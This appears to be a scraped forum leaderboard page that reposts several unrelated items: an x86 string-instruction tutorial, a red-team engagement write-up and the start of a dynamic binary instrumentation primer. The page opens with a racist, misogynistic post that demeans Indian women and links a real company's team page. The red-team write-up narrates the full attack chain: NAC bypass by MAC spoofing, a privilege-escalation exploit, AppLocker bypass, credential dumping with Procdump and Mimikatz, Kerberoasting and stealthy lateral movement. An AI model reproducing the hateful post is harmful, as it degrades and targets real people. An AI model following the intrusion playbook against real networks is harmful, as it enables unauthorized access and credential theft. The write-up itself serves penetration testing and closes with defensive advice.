Leaderboard
Popular Content
Showing content with the highest reputation on 08/07/18 in all areas
-
High class pussy in India.. rarely but maybe you find it here and there. Most majority is dirty, stinking, nasty, gypsy-like pussy in there. This is the kind of pussy they work with - https://www.hakunamatata.in/our-team/ that's "shit-in-pussy" class at best4 points
-
4 points
-
For the most part it is somewhat safer than PHP (and faster), it is easier to develop web applications in it (and not only web applications), you get packages much like in Python, you have more control over functionality (when you write a web application), the syntax is much simpler than in other web languages, it is easy to learn, it has fairly good to very good support for multithreading through coroutines (goroutines) and channels, it has native support for templates (again, for web development), and it is very flexible. Go is not a web language but a systems language that can also do web (and does it very well). (These are the advantages I have seen after roughly a year and a bit of working with Go.)
1 point
-
Ophir Harpaz
Cybercrime researcher at Trusteer, IBM Security. Beginner reverse engineer. Author of https://begin.re.
Jul 23

A Summary of x86 String Instructions

I have never managed to memorize all of x86 Assembly's string instructions, so I wrote a cheat sheet for myself. Then I thought other people may find it useful too, and so this cheat sheet is now a blog post. This is what you'll find here:

1. The logic behind x86 string instructions.
2. All the information from (1) squeezed into a table.
3. A real-life example.

Let's go.

Note: in order to understand this post, basic knowledge in x86 Assembly is required. I do not explain what registers are, how a string is represented in memory, etc.

The Logic

The Prefix + Instruction Combo

First, let's make the distinction between string instructions (MOVS, LODS, STOS, CMPS, SCAS) and repetition prefixes (REP, REPE, REPNE, REPZ, REPNZ). Repetition prefixes are meaningful only when preceding string instructions. They cause the specified instruction to repeat as long as certain conditions are met, decrementing ECX after each iteration. The string instruction itself updates the relevant pointers after each iteration by the proper number of bytes. The possible combinations of prefixes and instructions are described in the following figure.

Figure: Possible combinations of repetition prefixes (dark blue) and string instructions (light blue).

Note: I exclude the INS, OUTS string instructions as I have rarely seen them.

Termination Conditions

REP: repeat until ECX equals 0.
REPE, REPZ: repeat while the zero flag is set; stop once ECX equals 0 or the zero flag is cleared. The two prefixes mean exactly the same.
REPNE, REPNZ: repeat while the zero flag is unset; stop once ECX equals 0 or the zero flag is set. The two prefixes mean exactly the same.

String Instructions

The instruction's first three letters tell us what it does. The "S" in all instructions stands for (how surprising) "String".
Each of these instructions is followed by a letter representing the size to operate on: 'B' for byte, 'W' for word (2 bytes) and 'D' for double-word (4 bytes).

Some string instructions operate on two strings: the string pointed to by the ESI register (source string) and the string pointed to by the EDI register (destination string):

MOV moves data from the source string to the destination string.
CMP compares data between the source and destination strings (in x86, comparison is basically subtraction which affects the EFLAGS register).

Figure: Strings pointed to by the ESI, EDI registers.

Other string instructions operate on only one string:

LOD loads data from the string pointed to by ESI into EAX¹.
STO stores data from EAX¹ into the string pointed to by EDI.
SCA scans the data in the string pointed to by EDI and compares it to EAX¹ (again, along with affecting EFLAGS).

Notes:
1. I use EAX to refer to AL for byte operations, AX for word operations and EAX for double-word operations.
2. After each iteration, ESI and EDI are incremented if the direction flag is clear, and decremented if it is set.

Figure: REPE CMPSB for Trump's Rescue.

Cheat Sheet

Figure: Cheat sheet for x86 Assembly's string instructions.

A Real-Life Example

Lately, we started doing CTFs at work (Trusteer, IBM Security). I stumbled upon a crack-me challenge from reversing.kr which contained the following function. Try to think about what this function is while we reverse engineer it together.

The function receives three arguments and puts the third (arg_8) in ECX. If arg_8 equals zero, the function returns. Otherwise, we prepare the other registers for a string instruction: the first argument, arg_0, is moved into EDI and EAX is set to zero.

Now, we have a REPNE SCASB: the string pointed to by EDI is scanned and each character is compared to zero, held by AL. This happens until ECX equals zero or until a null terminator is scanned. Practically speaking, this instruction aims at finding the length of the destination string.
If ECX ends up being zero (meaning a null terminator was not encountered), then ECX simply receives its original value back, arg_8. Otherwise, if the loop terminates due to a null character, ECX is set to the destination string's length (including the null character). In other words, ECX is set to Min{ECX, len(destination_string)}.

Now EDI is set to arg_0 and ESI is set to arg_4, and we have REPE CMPSB: each character pointed to by EDI is compared to the corresponding one pointed to by ESI. This happens until ECX equals zero (namely, the destination string has been fully consumed) or until the zero flag is unset (namely, until a difference between the strings is detected).

Then, the last compared character of the EDI string is checked against the last compared character of the ESI string:

If they are equal, the function returns zero (ECX XORed with itself).
If the character in [ESI-1] has a higher ASCII value than the one in [EDI-1], the function returns 0xffffffff, or -1. This happens when the source string is lexicographically bigger than the destination string.
Otherwise, the function returns not 0xfffffffe, which is 1.

I reverse-engineered the function at work and then went to a colleague to see how he was doing. To my surprise, his IDA recognized this function as strncmp. My version didn't. Argh.

strncmp displays a nice usage of string instructions which makes it a nice function for practice. In any case, now you know how strncmp is implemented.

Source: https://medium.com/@ophirharpaz/a-summary-of-x86-string-instructions-87566a28c20c
1 point
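The strncmp walkthrough in the post above can be mirrored in a few lines of Python. This is only a sketch under stated assumptions: the direction flag is taken to be clear, memory is modeled as one flat bytes object, and the helper names (repne_scasb, repe_cmpsb, strncmp_sketch) are made up for illustration; they are not taken from the crack-me or from any library.

```python
def repne_scasb(mem, edi, al, ecx):
    """Emulate REPNE SCASB (DF clear): scan bytes at mem[edi:] for the value in AL.

    Returns the updated (edi, ecx, zf).
    """
    zf = False
    while ecx != 0:
        zf = mem[edi] == al      # SCASB compares AL with the byte at [EDI]
        edi += 1                 # DF clear, so EDI moves forward
        ecx -= 1                 # the prefix decrements ECX
        if zf:                   # REPNE stops once the zero flag is set
            break
    return edi, ecx, zf


def repe_cmpsb(mem, esi, edi, ecx):
    """Emulate REPE CMPSB (DF clear): compare bytes at [ESI] and [EDI].

    Returns the updated (esi, edi, ecx, zf).
    """
    zf = True
    while ecx != 0:
        zf = mem[esi] == mem[edi]
        esi += 1
        edi += 1
        ecx -= 1
        if not zf:               # REPE stops once the zero flag is cleared
            break
    return esi, edi, ecx, zf


def strncmp_sketch(s1: bytes, s2: bytes, n: int) -> int:
    """Follow the post's walkthrough: s1 plays arg_0 (EDI), s2 plays arg_4 (ESI)."""
    if n == 0:                   # arg_8 == 0: return immediately
        return 0
    # Hypothetical flat memory holding both NUL-terminated strings.
    mem = s1 + b"\x00" + s2 + b"\x00"
    dst, src = 0, len(s1) + 1
    # Step 1: bound the comparison length by the destination string's length.
    _, ecx, _ = repne_scasb(mem, dst, 0, n)
    count = n - ecx              # min(n, len(s1) + 1), NUL included
    # Step 2: compare the two strings byte by byte.
    esi, edi, _, _ = repe_cmpsb(mem, src, dst, count)
    last_src, last_dst = mem[esi - 1], mem[edi - 1]
    if last_src == last_dst:
        return 0
    return -1 if last_src > last_dst else 1
```

The return convention follows the walkthrough: -1 when the byte from the ESI string is larger, 1 when the byte from the EDI string is larger, 0 when the compared prefix is identical.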
-
Kerberoasting, exploiting unpatched systems – a day in the life of a Red Teamer
May 21, 2018, Chetan Nayak

The Scope

Recently, we conducted a red team assessment for a large enterprise client where the scenarios allowed were to either use the hardened laptop of the client or to try and connect our own laptop to the network (though they did have a Network Access Control system in place). This blog post lists our attempts to overcome the security controls, escalate our privileges, and move through the network, while at the same time ensuring that the SOC does not pick up our activities. For the purpose of this blog, I will be using a fictitious name for the bank: SPB-Groups.

Preliminary Escalation: Day 1

We were given a system with Windows 7 x64 and a user named SPB-RANDOM-USER. The user was a non-admin and had extremely limited privileges on the network. PowerShell was blocked on all endpoints. The given system had Symantec AV and Microsoft Security Essentials (MSE) installed, both fully up to date. Additionally, Cisco NAC agents were deployed to prevent unauthorized access by external laptops to the client network. All USB ports were disabled; Wi-Fi was enabled, but without any Internet access.

So, the first thing we did was to look for any misconfiguration in the given system through which we could escalate our privileges to local admin. We couldn't find any, since most things were blocked by the group policy itself. We decided to split the whole task into two parts. My colleague started to analyze different ways to bypass the security mechanisms on the laptop while I started looking for ways to get access to the network via my personal laptop.
Upon searching for patches using the command below:

    wmic qfe list full /format:htable > Updates.html

we found that the client machine was vulnerable to Meltdown (CVE-2017-5754) and Windows COM Privilege Escalation (CVE-2017-0213). I quickly started searching online for a POC for either of the exploits. It was hard to get hold of one for Meltdown since it was newly released and there was only a POC which stated whether the system was vulnerable or not. Using that POC to write a custom Meltdown exploit was something we decided to do only if everything else failed, since it would be pretty time consuming. However, I found a working binary for CVE-2017-0213 which I have uploaded here. The original source code of the exploit can be found here.

Now we had an exploit which could work, but there was a risk of the AV detecting it and alerting the SOC, which we obviously wanted to avoid. Before testing the exploit, we decided to disconnect the machine from their network and connect to our personal hotspot to upload the exploit binaries via HTTP. I then modified the exploit to avoid AV detection, but MSE detected it no matter how much we modified it. Now we were stuck with a laptop which we weren't able to exploit and couldn't connect back to the network, since it would send an alert of the AV detection.

So, while my colleague was busy trying to find a way to bypass the AV, I tried to see if I could bypass the NAC security and get access to the network on my personal laptop. There was a Cisco IP Phone in the room where we were sitting, and I started messing around with it to see if I could get access to the LAN through it. I found that Authentication was enabled without any password. So, I disabled the authentication, changed the mode to Non-Secure and found the MAC address of the IP Phone. I then spoofed the MAC address on my personal Windows machine as below.
Device Manager-> Network Adapters -> Ethernet Adapter -> Advanced -> Network Address -> Value Now before connecting my machine to the network I decided to change my hostname to something that matches the hostname schema of the company so that I can hide my laptop in plain sight in the proxy/firewall logs, something like SPB-ComputerName. I then connected the LAN cable and boom! I got an IP address and I was connected to their network. Next step was to find out where were the AD/DC, DNS Servers located. More important than finding the Forest DC was to find the key business Servers which contained the main business applications. Getting access to those meant getting access to the real crown jewels. Rogue Scanning: Day 2 Start of day 2 was disappointing. We returned to the client location only to find out that the primary system which was given to us had already connected back to the WiFi network of the office. This meant that the AV had already pushed up all the alerts that were raised during testing out the exploits a day back. Another problem was when we opened up the laptop, we saw that new patches had been installed and the system was rebooted automatically. Meltdown was patched now. We thought of just keeping the system aside and targeting the network from my personal computer. Instead of using Nmap or some other tool to scan, we decided to directly check the ARP cache and the netstat of the local system. We found a system with the naming convention SPB-DC08 and SPB-RDS30. Looking at the naming convention, we were able to identify that the first one was a DC and second was a Remote Desktop Server. This server RDS30 turned out to be the jump server which is used to connect to various server segments. We then used a PowerShell module named Get-ADComputer on our personal laptop to query the AD to get a list of computers from the AD itself. 
Doing this it will make sure only legitimate systems are queried and it would keep us away from scanning any decoys (if it were present) or atleast that was the hope. While the query was running, we thought of trying to connect via RDP to the RDS30 server with the default user we were given. We successfully connected to the machine. It was a Windows server 2008 with no AV installed. PowerShell was still blocked however. We had to get PowerShell up and running on this machine there if we wanted to proceed further. Most of the times the Windows AppLocker and the Group Policies block the PowerShell via the file hash. This means if I could use a custom binary to call the PowerShell DLL via winAPI, it would surely work. We thus used the PowerShDLL DLL to call the PowerShell DLL via CMD instead of directly calling the exe of the PowerShell via rundll32. With this we were easily able to bypass the Windows Group Policy App locker/Security policies and get a PowerShell Console. Once, we had PowerShell access in the domain itself, we started to enumerate User SPNs so as to perform Kerberoasting. We used the PowerShell script GetUserSPN.ps1 script to get a list of all user SPNs. Alternatively we thought that since patches are deployed on all systems via SCCM, if our previous system was vulnerable to the CVE-2017-0213, even this should be. And since there is no AV installed, we should be able to escalate our privilege. We moved the CVE binary from my system via RDP to the remote target, executed it and boom! I added a new user as a local admin for persistence which I can connect via Psexec.exe in case my existing user gets blocked since it had already triggered the AV previously. Persistence is a pretty important thing when you perform red team assessments. Now the next best step was to dump the credentials of the system. I used Procdump.exe as below. The aim was to use as low a number of malicious binaries as possible. 
Since Procdump is officially signed by Microsoft, there was a less chance of it getting sighted as malicious. Once a dump was created, we copied it back to our system and used Mimikatz to dump the creds locally. P.S.: The usernames, domain names, rootkeys, passwords, Authentication IDs which you can see below all have been modified to virtual ones. These are not real and only made to look real so as to make it relatable to the blog. Now we had access to around 8-9 credentials, most of them were normal users however and still we were far away from getting Domain Admins or Application Admins. But this was a good start. Now came the time when we decided to start moving laterally. We started enumerating other systems by guessing and querying the DC name we gathered previously. So, if one system name is RDS30, then there must be others numerically like rds01, rds02, rds03 and so on. So, I wrote a simple script to perform nslookup on the DC in a loop on all these machines to see which machines existed so that I can use the dumped credentials to move laterally throughout the organization. Also, we found a lot of users logged in with the domain/computer SPB-ERP, SPB-IT-HR, SPB-CC-DBADMIN other than the 8-9 compromised users above. This is when we realized that these are not real users. These were the Decoy users and if we would’ve used it, it would straight away raise an alert. So, we decided to use only users which were in the current domain, which looked legit by the naming convention or had logged in 2-3 days old only and by looking at the last login in Mimikatz dump. The Lateral Movement: Day 3 So, one thing we decided was that we won’t use the same creds to login to different machines. So, we started to login with different creds every time we RDP’d to other systems. 
For eg:- If we had users like SPB-user1, SPB-user2, SPB-user3 and machines like SPB-system1, SPB-system2, SPB-system3; we were moving like this: Login to SPB-system1 with SPB-user1 via RDP Login to SPB-system2 from SPB-system1 via SPB-user2 via RDP Login to SPB-system3 from SPB-system2 from SPB-system1 via SPB-user3 via RDP and so on We were basically 10 systems deep, had slow systems and lagging network connectivity but it kept everything quiet and outside the radar. Every system we logged in, we were taking a look at C:\Users to see if any new user had logged into the system recently (Change in date and time of the folder with username). We were only exploiting the system to dump creds, if any good users were there like DC-Admin, Support-Admin or SAP Admin. In this manner we reached around 60+ RDS systems gathering almost 90-100+ users logged in to the system. We finally found an RDS user and this user had access to most of the RDS System with a bit higher privileges than the normal users that we were using. We also found an excel sheet in one of the RDS Desktop’s C:\ drive with the name “Users info”. When I opened it up it contained usernames and passwords of all local admins of the RDS Systems. This was like hitting the jackpot! So almost all RDS Servers were pawned at this point. Now since we had access to almost all RDS servers, we had 2 options. Primary one being to wait for some admin to login to RDS, check every user folder and then again dump the password for that. Or we can simply run Bloodhound to find active session of users to different computers. Finally, being tired of doing this manually, we decided to use BloodHound. We downloaded the compiled dot net binary of BloodHound and ran it on one of the RDS server SPB-RDS46. And lo and behold. BloodHound gave us a list of active sessions of users and which system they are logged in into currently. 
P.S.: The images are for representational purposes only.

After checking the details in BloodHound, we found that one of the VMware admins was logged in to RDS53. We quickly jumped to that server, only to find that all updates had been installed on the system and it was prompting for a reboot to apply them. We postponed the reboot for 10 minutes and saw in the C:\Users folder that an SCCM admin had logged in to the system just 30 minutes earlier. We quickly executed the same CVE-2017-0213 exploit, ran Procdump and dumped the creds locally. And finally, we had found the VMware admin as well as the SCCM admin creds. It looks like the updates were not applied until the system was rebooted, and the SCCM admin had logged in to run Microsoft Baseline Security Analyzer for the patches, which was still running in the background.

We already had the VMware server name from the Get-ADComputer PowerShell query that we ran previously. We RDP'd into the system with the VMware admin user and found a web login for the VMware Management Server. We fired up the portal and tried the same creds we had found previously, and we were now the VMware admin, in control of all the virtualized systems within the data center.

Updated (to make the statement clearer): We then proceeded to extract the SPN tickets using the PowerShell access we had obtained through the earlier bypass, also used Impacket for Kerberoasting, and then brute forced the tickets to get the credentials. Using these we were able to get access to other systems with the service accounts, then dumped the credentials via Procdump and got the creds for the DC-Admin and also the KRBTGT hash. During the last 2 days I had to move to a different project, and my colleague performed these steps to get the DC. Thus, I have explained only my part in this blog post.

We compromised almost all of the users connected to the servers: SCCM admins, a few HR and IT personnel, RDS users and all the VMware server users.
It was striking how simple mistakes, or even a single missing patch, can lead to this much damage. If only the NAC had been implemented properly, none of this would have been possible, since the other system provided by the client was practically useless to us with all the security they had applied.

Recommendations

The NAC was the main point of compromise here. Without the NAC agent installed, the network shouldn't even have assigned an IP address to my personal laptop.

Also, the new user that was created and given to us for the activity had low-level access to a number of jump servers. This basically meant that the AD was improperly set up, with new employees assigned by default to a group that has access to servers. The users and the server segments should have been properly segregated, and users shouldn't be allowed to RDP or connect to any servers unless there is an absolute business need for it.

Another issue was that there was no endpoint protection deployed beyond the anti-virus agent. A UEBA tool or an EDR tool, or even simply Sysmon with some open source analytical tool to analyze what's happening in the background, would possibly have helped pick up the activity.

And the main part was that WDigest credential caching was not disabled on the servers where we dumped the credentials. If it had been, we would have found only the password hashes and not the cleartext credentials in the dump.

Also, when we pwned the DC via Kerberoasting, we had to crack the credentials from the tickets we captured, and the passwords in use could be easily cracked using a wordlist. So complex passwords for service accounts are still a very important security control. Additionally, monitoring for Kerberoasting attacks is now strongly recommended.

Chetan Nayak, OSCP | Security Researcher at Network Intelligence. Chetan Nayak is a security researcher in Network Intelligence.
He has a keen interest in malware development, hacking networks, RF devices and threat hunting.
Source: http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/
1 point
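The recommendation to monitor for Kerberoasting in the write-up above can be illustrated with a small defensive sketch. Windows logs Kerberos service ticket requests as Security event 4769, and roasting tools often request tickets with the RC4-HMAC encryption type (0x17). Everything else here is an assumption made for illustration: the events are taken to be already parsed into dictionaries, the keys (event_id, account, service, etype, time), the threshold and the time window are hypothetical, and real deployments would need tuning against normal traffic.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # ticket encryption type often requested during Kerberoasting


def flag_kerberoast_candidates(events, max_services=5,
                               window=timedelta(minutes=10)):
    """Return accounts that requested RC4 service tickets for more than
    max_services distinct services within any single time window.

    events: iterable of dicts with the hypothetical keys
            event_id, account, service, etype, time (a datetime).
    """
    by_account = defaultdict(list)
    for ev in events:
        # Keep only service ticket requests (4769) that used RC4-HMAC.
        if ev["event_id"] == 4769 and ev["etype"] == RC4_HMAC:
            by_account[ev["account"]].append((ev["time"], ev["service"]))

    flagged = set()
    for account, requests in by_account.items():
        requests.sort()          # order by request time
        start = 0
        for end in range(len(requests)):
            # Shrink the sliding window until it spans at most `window`.
            while requests[end][0] - requests[start][0] > window:
                start += 1
            services = {svc for _, svc in requests[start:end + 1]}
            if len(services) > max_services:
                flagged.add(account)
                break
    return sorted(flagged)
```

A single account asking for many different service tickets in a short burst is only a heuristic signal, so the output is best treated as a list of candidates to review rather than as confirmed attacks.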
-
Dynamic Binary Instrumentation Primer Jul 25, 2018 • By rui Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of a binary application at runtime through the injection of instrumentation code - Uninformed 2007 Introduction The purpose of this post is to document my dive into the “world” of Dynamic Binary Instrumentation. I’ll cover some of the most well known and used DBI frameworks. That is Pin, DynamoRIO, and Frida. From these three I’ll mainly focus on Pin. There are other DBI frameworks that I won’t touch at all, like Valgrind, Triton (uses Pin), QDBI, BAP, Dyninst, plus many others. You might want to have a look at them. Some are more mature, some are less mature. Some have more features, some have fewer features. You’ll have to do some research yourself and see which ones fit your needs. Even though Valgrind is one of the most widely known, and used DBI frameworks, it’s only available for Linux. So, I won’t touch it at all. In my vulnerability hunting adventures I’ve been focused on Windows, and in fact, if you want to take the code I’ll present here and build it on Linux it should be pretty straightforward. While the opposite wouldn’t be true. The reason being is that building Pin or DynamoRIO on Windows can be a bit frustrating. Especially if you aren’t motivated to do so. I’m not an expert in this area (DBI), however since the beginning of the year that I’ve been doing some experiments around Fuzzing, and I’ve read a lot about the subject. Hence, I’ll try to document some of what I learned for future reference. Possibly you’ll also find it useful. Note that my goal was to write a reference and not a tutorial. The funny part is that I actually thought about doing “something” with Pin, or DynamoRIO, while trying to do some browser Heap Spraying. Basically, I wanted to monitor the memory allocations my code was producing. While I could do it inside a debugger I thought, “why not use a DBI framework? Maybe I can learn something”. 
After all, debuggers are slow. Until today, I’m still unsure if I prefer to use WinDbg or Pin for this anyway. Instrumentation According to Wikipedia, instrumentation refers to an ability to monitor or measure the level of a product’s performance, to diagnose errors and to write trace information. Programmers implement instrumentation in the form of code instructions that monitor specific components in a system (…). When an application contains instrumentation code, it can be managed using a management tool. Instrumentation is necessary to review the performance of the application. Instrumentation approaches can be of two types: Source instrumentation and binary instrumentation. As stated above, there are two types of instrumentation. Source instrumentation, which is not possible if you don’t have the source code of the software application. And binary instrumentation, which can be used with any software application assuming we can execute it. It turns out that most of the programs you run on a Windows operating system are closed source. Which means, in this post, I’ll be “talking” only about binary instrumentation. Often called Dynamic Binary Instrumentation, or Dynamic Binary Modification. Because words take too long, usually people use the acronym DBI, as I already did above. In a one-line statement, Dynamic Binary Instrumentation is a technique that involves injecting instrumentation code into a running process. The instrumentation code will be entirely transparent to the application that it’s been injected to. With a DBI framework, we can analyze the target binary execution step by step. However, note that the analysis only applies to executed code. Dynamic Program Analysis There are two types of program analysis, static, and dynamic. We perform static analysis without running a computer program. While we perform dynamic analysis when we run a computer program. 
Citing Wikipedia again, Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor. For dynamic program analysis to be effective, the target program must be executed with sufficient test inputs to produce interesting behavior. Use of software testing measures such as code coverage helps ensure that an adequate slice of the program’s set of possible behaviors has been observed. Dynamic binary modification tools, like the frameworks mentioned earlier, introduce a layer between a running program and the underlying operating system. Providing a unique opportunity to inspect and modify user-level program instructions while a program executes. These systems are very complex internally. However, all the complexity is masked in an API that allows any user to quickly build a multitude of tools to aid software analysis. And that’s what I’ll try to show in this post, by sharing some code I wrote while playing with some DBI frameworks. There are many reasons for us to observe and modify the runtime behavior of a computer program. Software and/or hardware developers, system engineers, bug hunters, malware analysts, end users, and so on. All of them will have their own reasons. DBI frameworks provide access to every executed user-level instruction. Besides a potentially small runtime and memory overhead, the program will run identically to a native execution. You can say that the main advantage of static analysis is that it ensures 100% code coverage. With dynamic analysis, to ensure a high code coverage we’ll need to run the program many times, and with different inputs so the analysis takes different code paths. However, in some cases, the software applications are so big that’s too costly to perform static analysis. I would say, one complements the other. Even though static analysis is very boring, and dynamic analysis is (very) fun. 
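The point that dynamic analysis only sees executed code, and needs several inputs to reach good coverage, can be shown with a toy example. This is an analogy only: Python's sys.settrace hook stands in for a DBI framework here, and it traces Python source lines rather than machine instructions. The classify function and the executed_lines helper are hypothetical names invented for this sketch.

```python
import sys


def classify(n):
    if n < 0:
        return "negative"
    if n == 0:
        return "zero"
    return "positive"


def executed_lines(func, *args):
    """Run func(*args) and return the set of executed line offsets,
    counted from the function's def line (offset 0)."""
    code = func.__code__
    hit = set()

    def tracer(frame, event, arg):
        # Only follow frames that execute the target function's code.
        if frame.f_code is code:
            if event == "line":
                hit.add(frame.f_lineno - code.co_firstlineno)
            return tracer
        return None

    previous = sys.gettrace()
    sys.settrace(tracer)         # install the "instrumentation"
    try:
        func(*args)
    finally:
        sys.settrace(previous)   # always restore the previous hook
    return hit


# Each input exercises a different path; only the union covers every line.
coverage = set()
for value in (5, -1, 0):
    coverage |= executed_lines(classify, value)
```

A single run with a positive number never touches the "negative" or "zero" branches, which is the same limitation the text describes for dynamic analysis of binaries.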
As I mentioned before, DBI frameworks operate directly in binaries/executables. We don’t need the source code of the program. We don’t need to (re)compile or (re)link the program. Obviously, this is an major advantage, as it allows us to analyze proprietary software. A dynamic binary system operates at the same time as the “guest” program executes while performing all the requested/required modifications on the fly. This dynamic approach can also handle programs that generate code dynamically (even though it imposes a big engineering challenge), that is, self-modifying code. If you “google” a bit you’ll actually find multiple cases where DBI frameworks are/were used to analyze malware with self-modifying code. As an example, check this presentation from last year’s blackhat Europe. Or, this post about how to unpack Skype with Pin. DBI frameworks are daily used to solve computer architecture problems, being heavily used in software engineering, program analysis, and computer security. Software engineers want to deeply understand the software they develop, analyze its performance, and runtime behavior in a systematic manner. One common use of DBI frameworks is emulating new CPU instructions. Since the dynamic binary system has access to every instruction before executing it, hardware engineers can actually use these systems to test new instructions that are currently unsupported by the hardware. Instead of executing a specific instruction, they can emulate the new instruction behavior. The same approach can be used to replace faulty instructions with the correct emulation of the desired behavior. Anyway, from a computer security perspective, a DBI system can be used for flow analysis, taint analysis, fuzzing, code coverage, test cases generation, reverse engineering, debugging, vulnerability detection, and even crazy things like patching of vulnerabilities, and automated exploit development. There are two main ways of using a dynamic binary system. 
The first, and probably the most common, in computer security at least, is executing a program from start to finish under the control of the dynamic binary system. We use it when we want to achieve full system simulation/emulation because full control and code coverage are desired. The second is attaching to an already running program (exactly in the same way a debugger can be attached to, or detached from, a running program). This option might be useful if we are interested in figuring out what a program is doing at a specific moment.

Besides, most of the DBI frameworks have three modes of execution: interpretation mode, probe mode, and JIT mode. The JIT (just-in-time) mode is the most common implementation, and the most commonly used mode even when the DBI system supports more than one mode of execution. In JIT mode the original binary/executable is actually never modified or executed. The binary is seen as data, and a modified copy of the binary is generated in a new memory area (but only for the executed parts of the binary, not the whole binary). It is this modified copy that is then executed. In interpretation mode, the binary is also seen as data, and each instruction is used as a key into a lookup table of alternative instructions that have the corresponding functionality (as implemented by the user). In probe mode, the binary is actually modified by overwriting instructions with new instructions. Even though this results in a low run-time overhead, it is very limited on certain architectures (like x86).

Whatever the execution mode, once we have control over the execution of a program through a DBI framework, we have the ability to add instrumentation to the executing program. We can insert our code (the instrumentation) before and after blocks of code, or even replace them completely. We can visualize how it works in the diagram below.

Also, there are different types of granularity.
Instruction level
Basic block level
Function level

The granularity choice, as you can guess, will allow you to have more, or less, control over the execution of a program. Obviously, this will have an impact on performance. Also, note that instrumenting a program in its totality is impractical in most cases.

Performance

You might be wondering what the performance impact is of modifying a running program on the fly as described above. Well, I have very limited experience to answer this question. However, after reading multiple papers, articles, and presentations, my understanding is that the overhead commonly observed depends on a number of factors. Anyway, as kind of expected, the modifications the user implements are responsible for the majority of the overhead. The number 30% is apparently accepted as a commonly observed average. I can't really remember where I read this to mention the source, but I definitely read it somewhere. You'll find it for sure in the References section anyway. Obviously, one of the first decisions that you, as a DBI user, will have to make is the amount of code coverage your needs require and the amount of performance overhead you'll be able to accept as reasonable.

Pin

Pin is a DBI framework developed by Intel Corp. It allows us to build program analysis tools known as Pintools, for Windows, Linux, and OSX. We can use these tools to monitor, modify, and record the behavior of a program while it is running. Pin is proprietary software. However, we can download and use it free of charge for non-commercial use. Besides the documentation and the binaries, Pin also includes source code for a large collection of sample Pintools. These are invaluable examples that we must consider, and definitely read, before developing any Pintool.

In my opinion, Pin is the easiest DBI framework to use. At least I felt it was easier to dive into its API than into the DynamoRIO one.
Even though I didn’t spend too much time trying to learn other APIs besides these two, I had a look at a few others, like Valgrind, Triton, Dyninst, and Frida. The choice will always depend on what you intend to do, honestly. If you want to create a commercial tool and distribute binary versions of it, Pin won’t be a good choice. If that’s not the case, Pin might be a very good choice, mainly because, based on the tests I did, Pin is stable and reliable. I had some issues running some programs under some DBI frameworks, mainly big programs like Office suites, games, and AV engines. Some DBI frameworks were failing miserably, some even with small applications.

Pin setup (Windows)

Pin setup in Linux is quite straightforward. However, on Windows systems, it can be a bit tricky. See below how to quickly set it up to get started in case you want to try the samples I’ll present in this post. Get the latest Pin version from here, and unpack it on your C:\ drive, or wherever you want. For simplicity, I usually use C:\pin. I advise you to do the same if you plan to follow some of the experiments presented in this post.

The Pin zip file includes a big collection of sample Pintools under source/tools. The API is very easy to read and understand, as we’ll see. By the end of this post you should be able to read the source code of most of the samples without any struggle (well, kind of).

I like Visual Studio, and I’ll be using it to build “every” tool mentioned in this post. There’s one Pintool sample that’s almost ready to be built with Visual Studio. You’ll have to adjust only a couple of settings. However, I didn’t want to manually copy and rename files every time I wanted to create a new Pintool project. So I created a sample project already tweaked, available here, that you can place under C:\pin\source\tools, together with the following python script. The script was inspired by Peter’s script.
However, since newer versions of Visual Studio changed the way they save the settings, I had to write a completely new script. So, every time you want to build a new Pintool with Visual Studio, just do:

    cd\
    cd pin
    python create_pintool_project.py -p <name_of_your_project>

You can then just click the project’s solution file and build your Pintool with Visual Studio without any pain. I used Visual Studio Professional 2015, but it will also work with Visual Studio 2017. I did a couple of builds with Visual Studio 2017 Enterprise without any issue.

Pin Visual Studio integration

We can add our Pintools as external tools to Visual Studio. This will allow us to run, and test, our Pintool without using the command line all the time. The configuration is very simple. From the Tools menu, select External tools and a dialog box will appear. Click the Add button and fill out the text input boxes according to the image below.

In the Title text box, enter whatever you want. In the Command text box, enter the full path to your pin.exe, so c:\pin\pin.exe in case you installed it under c:\pin. In the Arguments text box, you must include all the arguments you want to pass to your Pintool. You’ll need at least the ones specified in the image above. The -t is to specify where your Pintool is, and after the -- is the target program you want to instrument.

After the setup, you can simply run your Pintool from the Tools menu as shown in the image below.

Click ok, and enjoy.

The Output window of Visual Studio will show whatever output your Pintool writes to stdout.

DynamoRIO

DynamoRIO is another DBI framework, originally developed in a collaboration between HP’s Dynamo optimization system and the Runtime Introspection and Optimization (RIO) research group at MIT. It allows us to build program analysis tools known as clients, for Windows and Linux. We can use these tools to monitor, modify, and record the behavior of a program while it is running.
DynamoRIO was first released as a proprietary binary toolkit in 2002 and was later open-sourced with a BSD license in 2009. Like Pin, it also comes with source code for multiple client samples. These are invaluable examples to get us started and playing with its API.

DynamoRIO is a runtime code manipulation system which allows code transformation on any part of the program as the program runs. It works as an intermediate platform between applications and the operating system.

As I said before, I didn’t find DynamoRIO’s API the most friendly and easy to use. However, if you plan to make a commercial version, and/or distribute binary versions, DynamoRIO might be the best option. One of its advantages is the fact that it is BSD licensed, which means free software. If that’s important for you, go with DynamoRIO.

Also note that it’s commonly accepted that DynamoRIO is faster than Pin (check the References section). However, it is equally accepted that Pin is more reliable than DynamoRIO, which I also personally experienced when running big software programs.

DynamoRIO setup (Windows)

To install DynamoRIO on Windows, simply download the latest Windows version from here (DynamoRIO-Windows-7.0.0-RC1.zip at the time of this writing) and, similarly to what we did with Pin, just unzip it under C:\dynamorio.

Building your own DynamoRIO projects on Windows can be a bit tricky though. You can try to follow the instructions here or the instructions here or, to avoid frustration, just… use my DynamoRIO Visual Studio template project.

As I said before, I like Visual Studio. I created a sample project already tweaked with all the includes and libs required (assuming you unzipped DynamoRIO in the directory I mentioned before), available here. Then, more or less the same way we did with Pin, also download the following python script.
Since the file structure of the project is a bit different, I couldn’t use the script I wrote before to clone a project, and I had to create a new one specific to DynamoRIO. So, every time you want to build a new DynamoRIO client with Visual Studio, just do:

    python create_dynamorio_project.py -p <name_of_your_project>

The command above assumes that both the Python script and the template project mentioned above are in the same folder.

You can then just click the project’s solution file and build your DynamoRIO client with Visual Studio without any pain. I used Visual Studio Professional 2015, but it will also work with Visual Studio 2017. I did a couple of builds with Visual Studio 2017 Enterprise without any issue.

DynamoRIO Visual Studio integration

